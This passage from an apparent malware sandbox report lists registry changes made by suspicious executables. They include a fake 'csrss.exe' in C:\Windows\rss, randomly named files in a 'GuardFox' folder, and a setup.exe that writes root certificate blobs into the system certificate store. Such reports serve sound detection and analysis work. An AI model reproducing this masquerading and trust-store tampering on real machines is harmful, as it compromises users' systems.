| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" | C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c7